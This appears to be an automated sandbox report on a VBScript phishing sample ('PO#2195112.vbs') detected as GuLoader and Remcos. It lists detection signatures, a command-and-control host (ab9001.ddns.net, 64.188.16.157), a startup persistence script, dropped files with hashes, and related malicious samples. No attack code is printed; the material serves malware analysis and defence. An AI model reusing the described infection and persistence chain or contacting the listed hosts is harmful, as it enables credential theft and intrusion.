    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1466651 Sample: PO#2195112.vbs Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 50 ab9001.ddns.net 2->50 52 geoplugin.net 2->52 58 Multi AV Scanner detection for submitted file 2->58 60 Sigma detected: Remcos 2->60 62 Sigma detected: Drops script at startup location 2->62 66 8 other signatures 2->66 9 wscript.exe 2 2->9         started        13 cmd.exe 1 2->13         started        signatures3 64 Uses dynamic DNS services 50->64 process4 file5 44 C:\Users\user\AppData\Roaming\dropped.bat, ASCII 9->44 dropped 70 VBScript performs obfuscated calls to suspicious functions 9->70 72 Wscript starts Powershell (via cmd or directly) 9->72 74 Windows Scripting host queries suspicious COM object (likely to drop second stage) 9->74 76 Suspicious execution chain found 9->76 15 cmd.exe 1 9->15         started        78 Very long command line found 13->78 80 Suspicious command line found 13->80 18 powershell.exe 13 13->18         started        20 conhost.exe 13->20         started        22 cmd.exe 1 13->22         started        signatures6 process7 signatures8 90 Wscript starts Powershell (via cmd or directly) 15->90 92 Very long command line found 15->92 94 Suspicious command line found 15->94 24 powershell.exe 3 33 15->24         started        29 conhost.exe 15->29         started        31 cmd.exe 1 15->31         started        96 Suspicious powershell command line found 18->96 33 powershell.exe 18->33         started        process9 dnsIp10 54 ab9001.ddns.net 64.188.16.157, 35890, 49710, 49712 ASN-QUADRANET-GLOBALUS United States 24->54 56 geoplugin.net 178.237.33.50, 49715, 80 ATOM86-ASATOM86NL Netherlands 24->56 46 C:\Users\user\AppData\Roaming\...\SC.cmd, ASCII 24->46 dropped 48 C:\ProgramData\remcos\logs.dat, data 24->48 dropped 82 Suspicious powershell command line found 24->82 84 Tries to harvest and steal browser information (history, passwords, etc) 24->84 86 Maps a DLL or memory area into another process 24->86 88 Installs a global keyboard hook 24->88 35 powershell.exe 1 24->35         started        38 powershell.exe 24->38         started        40 powershell.exe 8 24->40         started        42 4 other processes 24->42 file11 signatures12 process13 signatures14 68 Tries to harvest and steal browser information (history, passwords, etc) 35->68

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    PO#2195112.vbs24%ReversingLabsScript-WScript.Trojan.GuLoader
    PO#2195112.vbs8%VirustotalBrowse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    geoplugin.net1%VirustotalBrowse
    ab9001.ddns.net1%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://geoplugin.net/json.gp0%URL Reputationsafe
    https://aka.ms/pscore6lB0%URL Reputationsafe
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
    https://www.google.com0%Avira URL Cloudsafe
    https://aefd.nelreports.net/api/report?cat=bingaot0%Avira URL Cloudsafe
    https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL0%Avira URL Cloudsafe
    http://www.imvu.comr0%Avira URL Cloudsafe
    https://www.office.com/0%Avira URL Cloudsafe
    https://www.google.com0%VirustotalBrowse
    https://aefd.nelreports.net/api/report?cat=bingth0%Avira URL Cloudsafe
    https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat0%Avira URL Cloudsafe
    http://www.imvu.com0%Avira URL Cloudsafe
    https://aefd.nelreports.net/api/report?cat=wsb0%Avira URL Cloudsafe
    https://www.office.com/0%VirustotalBrowse
    https://aefd.nelreports.net/api/report?cat=bingrms0%Avira URL Cloudsafe
    https://aefd.nelreports.net/api/report?cat=bingaot0%VirustotalBrowse
    https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL0%VirustotalBrowse
    https://aefd.nelreports.net/api/report?cat=bingth0%VirustotalBrowse
    http://www.imvu.com0%VirustotalBrowse
    http://www.nirsoft.net0%Avira URL Cloudsafe
    https://aefd.nelreports.net/api/report?cat=bingaotak0%Avira URL Cloudsafe
    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg0%Avira URL Cloudsafe
    https://aefd.nelreports.net/api/report?cat=wsb0%VirustotalBrowse
    https://deff.nelreports.net/api/report?cat=msn0%VirustotalBrowse
    https://aefd.nelreports.net/api/report?cat=bingrms0%VirustotalBrowse
    http://www.nirsoft.net0%VirustotalBrowse
    https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
    http://www.nirsoft.net/0%Avira URL Cloudsafe
    https://aefd.nelreports.net/api/report?cat=bingaotak0%VirustotalBrowse
    http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
    https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&0%Avira URL Cloudsafe
    http://www.ebuddy.com0%Avira URL Cloudsafe
    http://www.nirsoft.net/0%VirustotalBrowse
    http://www.ebuddy.com0%VirustotalBrowse

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    geoplugin.net
    		178.237.33.50
    		truefalseunknown
    ab9001.ddns.net
    		64.188.16.157
    		truetrueunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://geoplugin.net/json.gpfalse
    • URL Reputation: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://www.google.compowershell.exe, powershell.exe, 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://www.office.com/bhv8D61.tmp.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://www.imvu.comrpowershell.exe, 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=ELbhv8D61.tmp.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://aefd.nelreports.net/api/report?cat=bingaotbhv8D61.tmp.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://aka.ms/pscore6lBpowershell.exe, 00000006.00000002.2132405885.0000000005046000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2132405885.0000000005031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2291219894.0000000004BA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2291219894.0000000004BB8000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://aefd.nelreports.net/api/report?cat=bingthbhv8D61.tmp.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhv8D61.tmp.14.drfalse
    • Avira URL Cloud: safe
    		unknown
    http://www.imvu.compowershell.exe, powershell.exe, 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://aefd.nelreports.net/api/report?cat=wsbbhv8D61.tmp.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://aefd.nelreports.net/api/report?cat=bingrmsbhv8D61.tmp.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://www.nirsoft.netpowershell.exe, 0000000E.00000002.2283295225.0000000000914000.00000004.00000010.00020000.00000000.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://aefd.nelreports.net/api/report?cat=bingaotakbhv8D61.tmp.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgbhv8D61.tmp.14.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://deff.nelreports.net/api/report?cat=msnbhv8D61.tmp.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://www.nirsoft.net/powershell.exe, 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.2132405885.0000000005031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2291219894.0000000004B91000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.compowershell.exe, 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&bhv8D61.tmp.14.drfalse
    • Avira URL Cloud: safe
    		unknown
    http://www.ebuddy.compowershell.exe, powershell.exe, 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown

    World Map of Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public IPs

    IPDomainCountryFlagASNASN NameMalicious
    64.188.16.157
    		ab9001.ddns.netUnited States
    		8100ASN-QUADRANET-GLOBALUStrue
    178.237.33.50
    		geoplugin.netNetherlands
    		8455ATOM86-ASATOM86NLfalse

    General Information

    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1466651
    Start date and time:2024-07-03 08:43:03 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 5m 27s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:21
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:PO#2195112.vbs
    Detection:MAL
    Classification:mal100.troj.spyw.expl.evad.winVBS@30/18@2/2
    EGA Information:
    • Successful, ratio: 50%
    HCA Information:
    • Successful, ratio: 99%
    • Number of executed functions: 51
    • Number of non-executed functions: 144
    Cookbook Comments:
    • Found application associated with file extension: .vbs

    Warnings

    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
    • Execution Graph export aborted for target powershell.exe, PID 6836 because it is empty
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtProtectVirtualMemory calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.

    Simulations

    Behavior and APIs

    TimeTypeDescription
    02:43:55API Interceptor2419786x Sleep call for process: powershell.exe modified
    08:43:57AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SC.cmd

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    64.188.16.157BL-RTM1439068.vbsGet hashmaliciousGuLoader, RemcosBrowse
      178.237.33.50TT_Payment_Slip.bat.exeGet hashmaliciousRemcosBrowse
      • geoplugin.net/json.gp
      SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
      • geoplugin.net/json.gp
      PAYMENT COPY.vbsGet hashmaliciousRemcos, GuLoaderBrowse
      • geoplugin.net/json.gp
      STATEMENT OF ACCOUNT.vbsGet hashmaliciousRemcos, GuLoaderBrowse
      • geoplugin.net/json.gp
      Requirement reference for quotation.exeGet hashmaliciousRemcosBrowse
      • geoplugin.net/json.gp
      STATEMENT OF ACCOUNT.vbsGet hashmaliciousRemcos, GuLoaderBrowse
      • geoplugin.net/json.gp
      710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exeGet hashmaliciousDBatLoader, RemcosBrowse
      • geoplugin.net/json.gp
      SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
      • geoplugin.net/json.gp
      Payment Confirmation.vbsGet hashmaliciousRemcos, GuLoaderBrowse
      • geoplugin.net/json.gp
      SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
      • geoplugin.net/json.gp

      Domains

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      geoplugin.netTT_Payment_Slip.bat.exeGet hashmaliciousRemcosBrowse
      • 178.237.33.50
      SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
      • 178.237.33.50
      PAYMENT COPY.vbsGet hashmaliciousRemcos, GuLoaderBrowse
      • 178.237.33.50
      STATEMENT OF ACCOUNT.vbsGet hashmaliciousRemcos, GuLoaderBrowse
      • 178.237.33.50
      Requirement reference for quotation.exeGet hashmaliciousRemcosBrowse
      • 178.237.33.50
      STATEMENT OF ACCOUNT.vbsGet hashmaliciousRemcos, GuLoaderBrowse
      • 178.237.33.50
      710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exeGet hashmaliciousDBatLoader, RemcosBrowse
      • 178.237.33.50
      SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
      • 178.237.33.50
      Payment Confirmation.vbsGet hashmaliciousRemcos, GuLoaderBrowse
      • 178.237.33.50
      SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
      • 178.237.33.50
      ab9001.ddns.netBL-RTM1439068.vbsGet hashmaliciousGuLoader, RemcosBrowse
      • 64.188.16.157
      SWIFT 103 202405291545524610 290524.vbsGet hashmaliciousGuLoader, RemcosBrowse
      • 94.156.64.200
      Swift mt103 483932024.vbsGet hashmaliciousGuLoader, RemcosBrowse
      • 94.156.67.228
      Forandringsstnings.vbsGet hashmaliciousGuLoader, RemcosBrowse
      • 94.156.67.228

      ASNs

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      ASN-QUADRANET-GLOBALUShesaphareketi_____.exeGet hashmaliciousAgentTeslaBrowse
      • 104.247.165.99
      hesaphareketi__.exeGet hashmaliciousAgentTeslaBrowse
      • 104.247.165.99
      nn7XSQfsNc.exeGet hashmaliciousGuLoaderBrowse
      • 147.78.240.182
      nn7XSQfsNc.exeGet hashmaliciousGuLoaderBrowse
      • 147.78.240.182
      xP1455Elxv.elfGet hashmaliciousMirai, MoobotBrowse
      • 23.153.78.247
      gO6RAJaFXe.elfGet hashmaliciousMiraiBrowse
      • 23.153.31.217
      r2ye3b3z8R.elfGet hashmaliciousMiraiBrowse
      • 156.239.26.202
      hesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse
      • 104.247.165.99
      hesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse
      • 104.247.165.99
      hesaphareketi-01-pdf.exeGet hashmaliciousAgentTeslaBrowse
      • 104.247.165.99
      ATOM86-ASATOM86NLTT_Payment_Slip.bat.exeGet hashmaliciousRemcosBrowse
      • 178.237.33.50
      SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
      • 178.237.33.50
      PAYMENT COPY.vbsGet hashmaliciousRemcos, GuLoaderBrowse
      • 178.237.33.50
      STATEMENT OF ACCOUNT.vbsGet hashmaliciousRemcos, GuLoaderBrowse
      • 178.237.33.50
      Requirement reference for quotation.exeGet hashmaliciousRemcosBrowse
      • 178.237.33.50
      STATEMENT OF ACCOUNT.vbsGet hashmaliciousRemcos, GuLoaderBrowse
      • 178.237.33.50
      710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exeGet hashmaliciousDBatLoader, RemcosBrowse
      • 178.237.33.50
      SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
      • 178.237.33.50
      Payment Confirmation.vbsGet hashmaliciousRemcos, GuLoaderBrowse
      • 178.237.33.50
      SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
      • 178.237.33.50

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\ProgramData\remcos\logs.dat

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:modified
      Size (bytes):508
      Entropy (8bit):7.556448235303562
      Encrypted:false
      SSDEEP:12:W7RXbT0Ig7NVZh6NpyVioAowqVlmPRrRxzCWrO2XHi21q2I:Wd0Z7NQNpyVTjiPbxOWrOwBFI
      MD5:390E6F5E869231B980B7352E93A18BB5
      SHA1:EF73B41D0E805AC6E48E1AB57374CD1D62B096CE
      SHA-256:E85428688B273684AD9DC5AAA615E4828EE1036A95D9DFCC1139DAB430D18945
      SHA-512:B5FED51DE89C7A17C0E3C8FD8014EDA473CFD862D191E779B45E5DAF0703A7420BB1DF19A58F52EE1FB38D67B28B059A87D61378FDF893164B2E834F07A9F144
      Malicious:true
      Preview:8.......~m;.........5........N8.....;.5t.&..P"....-...&K..Xhp....=..w...h..}.u*....{....4_."Na.....'anJhR...5....).H.{/VM....qS...Z..].+.B..W..{]T'ROv..;.z........<.. ]..,..(a.s...f.y(X....b_W...Z....W<.m...^.D.G._z..w.Y..PL..U|.i..(.h.~.m;.Kji....2CO...D.Uj*.ds..........N........}..Y..'4.W.#.....v*..,X........Fa)..*B...g....~Y...]'kh...bZ{O..@..$.._.U5t~0..Hky.w3.V...$I...K..-^...mZ.q>.X.{i0......B..;'.B.Vas*r..,i...Kp...@..T/....3........H..........>f."V8N.t.GFp.{.0..v

      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:JSON data
      Category:dropped
      Size (bytes):962
      Entropy (8bit):5.013130376969173
      Encrypted:false
      SSDEEP:12:tklu+mnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdVauKyGX85jvXhNlT3/7AcV9Wro
      MD5:F61E5CC20FBBA892FF93BFBFC9F41061
      SHA1:36CD25DFAD6D9BC98697518D8C2F5B7E12A5864E
      SHA-256:28B330BB74B512AFBD70418465EC04C52450513D3CC8609B08B293DBEC847568
      SHA-512:5B6AD2F42A82AC91491C594714638B1EDCA26D60A9932C96CBA229176E95CA3FD2079B68449F62CBFFFFCA5DA6F4E25B7B49AF8A8696C95A4F11C54BCF451933
      Malicious:false
      Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:dropped
      Size (bytes):5829
      Entropy (8bit):4.901113710259376
      Encrypted:false
      SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
      MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
      SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
      SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
      SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
      Malicious:false
      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:modified
      Size (bytes):64
      Entropy (8bit):0.34726597513537405
      Encrypted:false
      SSDEEP:3:Nlll:Nll
      MD5:446DD1CF97EABA21CF14D03AEBC79F27
      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
      Malicious:false
      Preview:@...e...........................................................

      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eqquqoso.ej0.psm1

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Preview:# PowerShell test file to determine AppLocker lockdown mode

      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_guhx1ir3.4ob.psm1

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Preview:# PowerShell test file to determine AppLocker lockdown mode

      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ih41ueii.2y3.ps1

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Preview:# PowerShell test file to determine AppLocker lockdown mode

      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ke0fwi21.nbe.psm1

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Preview:# PowerShell test file to determine AppLocker lockdown mode

      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nkln13hb.bmr.ps1

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Preview:# PowerShell test file to determine AppLocker lockdown mode

      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0ual0dm.gjs.ps1

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Preview:# PowerShell test file to determine AppLocker lockdown mode

      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s5kazo3e.x1q.ps1

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Preview:# PowerShell test file to determine AppLocker lockdown mode

      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xauxqvsl.prh.psm1

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Preview:# PowerShell test file to determine AppLocker lockdown mode

      C:\Users\user\AppData\Local\Temp\bhv8D61.tmp

      Download File
